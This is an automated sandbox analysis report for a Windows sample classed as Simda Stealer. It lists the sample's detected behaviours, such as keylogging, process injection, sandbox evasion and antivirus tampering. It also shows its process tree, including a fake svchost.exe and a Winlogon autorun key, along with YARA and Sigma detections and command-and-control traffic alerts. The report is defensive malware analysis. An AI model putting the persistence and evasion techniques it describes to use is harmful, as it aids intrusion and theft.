Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uavINoSIQh.exe

Overview

General Information

Sample name:uavINoSIQh.exe
renamed because original name is a hash value
Original sample name:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77.exe
Analysis ID:1553805
MD5:98422c3dece103de16c166c7fbea2f6c
SHA1:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77
SHA256:8eb3e521e20b9c7bbc6e71980c64d4a76e3db810ac2bbefec0d7780116101e70
Tags:exeuser-NDA0E
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • uavINoSIQh.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\uavINoSIQh.exe" MD5: 98422C3DECE103DE16C166C7FBEA2F6C)
    • svchost.exe (PID: 7444 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: ACF1B66F47538D1828695BAE8D83EF23)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 4084 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2604 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 6304 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 4628 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 6964 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 5632 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2772 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 2936 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1756 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1812 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 1900 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 5612 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe (PID: 3964 cmdline: "C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Click to see the 98 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.2.svchost.exe.26a3c00.6.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.13e0000.2.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.ee0000.2.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
Click to see the 173 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Files With System Process Name In Unsuspected Locations
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\uavINoSIQh.exe, ProcessId: 7384, TargetFilename: C:\Windows\apppatch\svchost.exe
Sigma detected: System File Execution Location Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7444, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uavINoSIQh.exe", ParentImage: C:\Users\user\Desktop\uavINoSIQh.exe, ParentProcessId: 7384, ParentProcessName: uavINoSIQh.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7444, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:07:52.399217+010020229301A Network Trojan was detected52.149.20.212443192.168.2.949270TCP
2024-11-11T18:08:30.801922+010020229301A Network Trojan was detected52.149.20.212443192.168.2.962630TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:07:38.149523+010020181411A Network Trojan was detected3.94.10.3480192.168.2.956860TCP
2024-11-11T18:07:38.828867+010020181411A Network Trojan was detected44.221.84.10580192.168.2.956870TCP
2024-11-11T18:07:43.103707+010020181411A Network Trojan was detected18.208.156.24880192.168.2.956913TCP
2024-11-11T18:07:54.975218+010020181411A Network Trojan was detected52.34.198.22980192.168.2.955973TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:07:38.149523+010020377711A Network Trojan was detected3.94.10.3480192.168.2.956860TCP
2024-11-11T18:07:38.828867+010020377711A Network Trojan was detected44.221.84.10580192.168.2.956870TCP
2024-11-11T18:07:43.103707+010020377711A Network Trojan was detected18.208.156.24880192.168.2.956913TCP
2024-11-11T18:07:54.975218+010020377711A Network Trojan was detected52.34.198.22980192.168.2.955973TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:07:37.529053+010020210221A Network Trojan was detected1.1.1.153192.168.2.955552UDP
2024-11-11T18:08:12.298141+010020210221A Network Trojan was detected1.1.1.153192.168.2.955413UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:07:38.142480+010028048521Malware Command and Control Activity Detected192.168.2.9568603.94.10.3480TCP
2024-11-11T18:07:38.533489+010028048521Malware Command and Control Activity Detected192.168.2.95686123.253.46.6480TCP
2024-11-11T18:07:38.535087+010028048521Malware Command and Control Activity Detected192.168.2.95686499.83.170.380TCP
2024-11-11T18:07:38.775166+010028048521Malware Command and Control Activity Detected192.168.2.95686918.208.156.24880TCP
2024-11-11T18:07:38.813587+010028048521Malware Command and Control Activity Detected192.168.2.956865188.114.96.380TCP
2024-11-11T18:07:38.823176+010028048521Malware Command and Control Activity Detected192.168.2.95687044.221.84.10580TCP
2024-11-11T18:07:38.831305+010028048521Malware Command and Control Activity Detected192.168.2.95687144.221.84.10580TCP
2024-11-11T18:07:38.878019+010028048521Malware Command and Control Activity Detected192.168.2.956872208.100.26.24580TCP
2024-11-11T18:07:38.908208+010028048521Malware Command and Control Activity Detected192.168.2.956874199.59.243.22780TCP
2024-11-11T18:07:39.016662+010028048521Malware Command and Control Activity Detected192.168.2.95687523.253.46.6480TCP
2024-11-11T18:07:39.603334+010028048521Malware Command and Control Activity Detected192.168.2.956872208.100.26.24580TCP
2024-11-11T18:07:39.811744+010028048521Malware Command and Control Activity Detected192.168.2.95687699.83.170.3443TCP
2024-11-11T18:07:39.915129+010028048521Malware Command and Control Activity Detected192.168.2.95688385.17.31.8280TCP
2024-11-11T18:07:39.990050+010028048521Malware Command and Control Activity Detected192.168.2.956873199.191.50.8380TCP
2024-11-11T18:07:40.393903+010028048521Malware Command and Control Activity Detected192.168.2.956884154.212.231.8280TCP
2024-11-11T18:07:40.399346+010028048521Malware Command and Control Activity Detected192.168.2.956880188.114.96.3443TCP
2024-11-11T18:07:40.532826+010028048521Malware Command and Control Activity Detected192.168.2.95688885.17.31.8280TCP
2024-11-11T18:07:40.748014+010028048521Malware Command and Control Activity Detected192.168.2.956865188.114.96.380TCP
2024-11-11T18:07:40.766398+010028048521Malware Command and Control Activity Detected192.168.2.956884154.212.231.8280TCP
2024-11-11T18:07:41.957137+010028048521Malware Command and Control Activity Detected192.168.2.956896188.114.96.3443TCP
2024-11-11T18:07:42.480434+010028048521Malware Command and Control Activity Detected192.168.2.95690513.248.169.4880TCP
2024-11-11T18:07:43.094747+010028048521Malware Command and Control Activity Detected192.168.2.9569123.94.10.3480TCP
2024-11-11T18:07:43.097029+010028048521Malware Command and Control Activity Detected192.168.2.95691318.208.156.24880TCP
2024-11-11T18:07:43.319223+010028048521Malware Command and Control Activity Detected192.168.2.956911188.114.96.380TCP
2024-11-11T18:07:43.506855+010028048521Malware Command and Control Activity Detected192.168.2.956915103.150.10.4880TCP
2024-11-11T18:07:44.573349+010028048521Malware Command and Control Activity Detected192.168.2.956915103.150.10.4880TCP
2024-11-11T18:07:45.418961+010028048521Malware Command and Control Activity Detected192.168.2.956920188.114.96.3443TCP
2024-11-11T18:07:45.827714+010028048521Malware Command and Control Activity Detected192.168.2.956911188.114.96.380TCP
2024-11-11T18:07:47.727136+010028048521Malware Command and Control Activity Detected192.168.2.956942188.114.96.3443TCP
2024-11-11T18:07:48.335359+010028048521Malware Command and Control Activity Detected192.168.2.95696076.223.67.18980TCP
2024-11-11T18:07:48.528190+010028048521Malware Command and Control Activity Detected192.168.2.95696164.225.91.7380TCP
2024-11-11T18:07:48.544333+010028048521Malware Command and Control Activity Detected192.168.2.95696544.221.84.10580TCP
2024-11-11T18:07:48.649502+010028048521Malware Command and Control Activity Detected192.168.2.956964103.224.212.21080TCP
2024-11-11T18:07:48.800073+010028048521Malware Command and Control Activity Detected192.168.2.956967103.224.182.25280TCP
2024-11-11T18:07:49.011613+010028048521Malware Command and Control Activity Detected192.168.2.956966154.85.183.5080TCP
2024-11-11T18:07:49.390994+010028048521Malware Command and Control Activity Detected192.168.2.956966154.85.183.5080TCP
2024-11-11T18:07:51.325141+010028048521Malware Command and Control Activity Detected192.168.2.94926964.225.91.7380TCP
2024-11-11T18:07:51.613163+010028048521Malware Command and Control Activity Detected192.168.2.94927672.52.179.17480TCP
2024-11-11T18:07:52.362516+010028048521Malware Command and Control Activity Detected192.168.2.94927772.52.179.17480TCP
2024-11-11T18:07:54.944524+010028048521Malware Command and Control Activity Detected192.168.2.95597352.34.198.22980TCP
2024-11-11T18:07:58.285586+010028048521Malware Command and Control Activity Detected192.168.2.95429244.221.84.10580TCP
2024-11-11T18:07:59.940430+010028048521Malware Command and Control Activity Detected192.168.2.956872208.100.26.24580TCP
2024-11-11T18:08:00.099845+010028048521Malware Command and Control Activity Detected192.168.2.956872208.100.26.24580TCP
2024-11-11T18:08:00.144995+010028048521Malware Command and Control Activity Detected192.168.2.95495385.17.31.8280TCP
2024-11-11T18:08:00.153686+010028048521Malware Command and Control Activity Detected192.168.2.956865188.114.96.380TCP
2024-11-11T18:08:00.293301+010028048521Malware Command and Control Activity Detected192.168.2.956884154.212.231.8280TCP
2024-11-11T18:08:00.308534+010028048521Malware Command and Control Activity Detected192.168.2.95495423.253.46.6480TCP
2024-11-11T18:08:00.322696+010028048521Malware Command and Control Activity Detected192.168.2.954955199.59.243.22780TCP
2024-11-11T18:08:00.369223+010028048521Malware Command and Control Activity Detected192.168.2.95495699.83.170.380TCP
2024-11-11T18:08:00.875450+010028048521Malware Command and Control Activity Detected192.168.2.956884154.212.231.8280TCP
2024-11-11T18:08:00.920285+010028048521Malware Command and Control Activity Detected192.168.2.95496285.17.31.8280TCP
2024-11-11T18:08:00.962845+010028048521Malware Command and Control Activity Detected192.168.2.95496323.253.46.6480TCP
2024-11-11T18:08:01.345730+010028048521Malware Command and Control Activity Detected192.168.2.95496499.83.170.3443TCP
2024-11-11T18:08:01.969269+010028048521Malware Command and Control Activity Detected192.168.2.954965188.114.96.3443TCP
2024-11-11T18:08:02.366358+010028048521Malware Command and Control Activity Detected192.168.2.956865188.114.96.380TCP
2024-11-11T18:08:04.669156+010028048521Malware Command and Control Activity Detected192.168.2.954978188.114.96.3443TCP
2024-11-11T18:08:05.043672+010028048521Malware Command and Control Activity Detected192.168.2.956915103.150.10.4880TCP
2024-11-11T18:08:05.190951+010028048521Malware Command and Control Activity Detected192.168.2.956911188.114.96.380TCP
2024-11-11T18:08:05.776408+010028048521Malware Command and Control Activity Detected192.168.2.956915103.150.10.4880TCP
2024-11-11T18:08:07.015466+010028048521Malware Command and Control Activity Detected192.168.2.955002188.114.96.3443TCP
2024-11-11T18:08:07.387221+010028048521Malware Command and Control Activity Detected192.168.2.956911188.114.96.380TCP
2024-11-11T18:08:09.279058+010028048521Malware Command and Control Activity Detected192.168.2.955020188.114.96.3443TCP
2024-11-11T18:08:09.679570+010028048521Malware Command and Control Activity Detected192.168.2.956966154.85.183.5080TCP
2024-11-11T18:08:09.918822+010028048521Malware Command and Control Activity Detected192.168.2.955032103.224.212.21080TCP
2024-11-11T18:08:09.966780+010028048521Malware Command and Control Activity Detected192.168.2.956966154.85.183.5080TCP
2024-11-11T18:08:09.967882+010028048521Malware Command and Control Activity Detected192.168.2.955033103.224.182.25280TCP
2024-11-11T18:08:11.832465+010028048521Malware Command and Control Activity Detected192.168.2.96221272.52.179.17480TCP
2024-11-11T18:08:12.333786+010028048521Malware Command and Control Activity Detected192.168.2.96221372.52.179.17480TCP
2024-11-11T18:08:20.358578+010028048521Malware Command and Control Activity Detected192.168.2.962370199.191.50.8380TCP
2024-11-11T18:08:22.156579+010028048521Malware Command and Control Activity Detected192.168.2.962592199.59.243.22780TCP
2024-11-11T18:08:22.212272+010028048521Malware Command and Control Activity Detected192.168.2.96259344.221.84.10580TCP
2024-11-11T18:08:25.605304+010028048521Malware Command and Control Activity Detected192.168.2.9626053.94.10.3480TCP
2024-11-11T18:08:25.606528+010028048521Malware Command and Control Activity Detected192.168.2.96260675.2.71.19980TCP
2024-11-11T18:08:25.608405+010028048521Malware Command and Control Activity Detected192.168.2.96260844.221.84.10580TCP
2024-11-11T18:08:25.633836+010028048521Malware Command and Control Activity Detected192.168.2.96260723.253.46.6480TCP
2024-11-11T18:08:25.828549+010028048521Malware Command and Control Activity Detected192.168.2.962611199.59.243.22780TCP
2024-11-11T18:08:25.837793+010028048521Malware Command and Control Activity Detected192.168.2.962610208.100.26.24580TCP
2024-11-11T18:08:25.869278+010028048521Malware Command and Control Activity Detected192.168.2.962604188.114.96.380TCP
2024-11-11T18:08:25.929132+010028048521Malware Command and Control Activity Detected192.168.2.96261318.208.156.24880TCP
2024-11-11T18:08:25.964401+010028048521Malware Command and Control Activity Detected192.168.2.96261444.221.84.10580TCP
2024-11-11T18:08:26.239476+010028048521Malware Command and Control Activity Detected192.168.2.962609154.212.231.8280TCP
2024-11-11T18:08:26.788544+010028048521Malware Command and Control Activity Detected192.168.2.9626153.94.10.3480TCP
2024-11-11T18:08:26.789277+010028048521Malware Command and Control Activity Detected192.168.2.96261918.208.156.24880TCP
2024-11-11T18:08:26.819831+010028048521Malware Command and Control Activity Detected192.168.2.96262023.253.46.6480TCP
2024-11-11T18:08:27.235548+010028048521Malware Command and Control Activity Detected192.168.2.962618154.212.231.8280TCP
2024-11-11T18:08:27.791975+010028048521Malware Command and Control Activity Detected192.168.2.962603199.191.50.8380TCP
2024-11-11T18:08:28.500498+010028048521Malware Command and Control Activity Detected192.168.2.962616199.191.50.8380TCP
2024-11-11T18:08:29.510956+010028048521Malware Command and Control Activity Detected192.168.2.96262344.221.84.10580TCP
2024-11-11T18:08:29.522912+010028048521Malware Command and Control Activity Detected192.168.2.962625199.59.243.22780TCP
2024-11-11T18:08:29.523610+010028048521Malware Command and Control Activity Detected192.168.2.96262475.2.71.19980TCP
2024-11-11T18:08:29.525711+010028048521Malware Command and Control Activity Detected192.168.2.96262644.221.84.10580TCP
2024-11-11T18:08:29.548220+010028048521Malware Command and Control Activity Detected192.168.2.962627208.100.26.24580TCP
2024-11-11T18:08:29.794161+010028048521Malware Command and Control Activity Detected192.168.2.962628188.114.96.380TCP
2024-11-11T18:08:30.745031+010028048521Malware Command and Control Activity Detected192.168.2.962610208.100.26.24580TCP
2024-11-11T18:08:30.992307+010028048521Malware Command and Control Activity Detected192.168.2.962609154.212.231.8280TCP
2024-11-11T18:08:31.100389+010028048521Malware Command and Control Activity Detected192.168.2.96263423.253.46.6480TCP
2024-11-11T18:08:33.742282+010028048521Malware Command and Control Activity Detected192.168.2.962612178.162.203.21180TCP
2024-11-11T18:08:33.983455+010028048521Malware Command and Control Activity Detected192.168.2.96263744.221.84.10580TCP
2024-11-11T18:08:33.987395+010028048521Malware Command and Control Activity Detected192.168.2.96263875.2.71.19980TCP
2024-11-11T18:08:34.313180+010028048521Malware Command and Control Activity Detected192.168.2.96264444.221.84.10580TCP
2024-11-11T18:08:34.358121+010028048521Malware Command and Control Activity Detected192.168.2.96264523.253.46.6480TCP
2024-11-11T18:08:34.656395+010028048521Malware Command and Control Activity Detected192.168.2.962617178.162.203.21180TCP
